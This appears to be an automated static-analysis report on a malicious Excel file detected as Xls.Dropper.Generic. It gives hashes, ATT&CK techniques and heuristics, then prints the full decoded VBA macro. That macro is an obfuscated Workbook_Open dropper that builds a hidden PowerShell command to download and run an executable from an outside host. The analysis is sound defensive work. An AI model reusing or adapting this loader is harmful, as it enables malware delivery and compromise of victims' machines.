Xls.Dropper.Generic-6595971-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 333ce82ca7591c39…

MALICIOUS

Office (OLE)

48.5 KB Created: 2009-02-14 12:31:57 Authoring application: Microsoft Excel First seen: 2019-05-10
MD5: e3d4caf532d46083b590d28b21a2effb SHA-1: fb65e518551a915fd3a4a6f304e3221e928601db SHA-256: 333ce82ca7591c39a27be2ec07ea3e213e7876ee968d7d736733566883a160bc
180 Risk Score

Malware Insights

Xls.Dropper.Generic-6595971-0 · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a Workbook_Open macro that uses the Shell() function to execute a PowerShell command. This command is constructed by concatenating several strings to form a URL and a filename for a second-stage executable. The macro attempts to download and execute this payload from 'http://monde.at/realst'. The Japanese text in the document body serves as a lure to encourage macro execution.

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2508 bytes
SHA-256: b6b00bc53f056c7c4fbfbb432485b95c951d9fe0465641003eb92799fcbb858b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True






























































Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
Function starsunfire()
Dim gardengrass As String
Randomize
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
Function fabinachii()
fabinachii = "cm" + ffmulti + "c ""  PO" + "weRsH" + dellpacket & ostinmuffa + staloneumo + libocountries & picassoweb
End Function
Function ffmulti()
ffmulti = "d.e" + "Xe   /"
End Function
Function picassoweb()
inextimer = starsunfire
holeblackdeep = "'tp:'+'//'+'mo'+'nde.at/r'+'eal'+'st'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
picassoweb = holeblackdeep + fantaandcola
End Function
Function ostinmuffa()
ostinmuffa = "Fil  ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv'));  d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo =   (ge"
End Function
Function dellpacket()
dellpacket = "ElL -noLOGO  -NOeXIt -noNI" + "NTERAcTIV  -WInDO  hiDd" + "en  -EXecUt" + "ionP  bYpAss  -nOpRO"
End Function
Sub Workbook_Open()
Shell fabinachii, fmTabOrientationTop

End Sub
Function libocountries()
hawaiiposition = "nT" + ").\""d" + "o`" + "Wn"
libocountries = "3}{0" + "}{2}\"" -f'c" + "','Ne" + "w-O" + "bj" + "','t','e') " + sheetunderground + hawaiiposition + "LO" + "aDF`I`lE\"".\""iN`Vo" + "Ke\""(('ht'+"
End Function
Function staloneumo()
depodeposit = "e(('M" + "y'+'D"
staloneumo = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91  ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + depodeposit + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True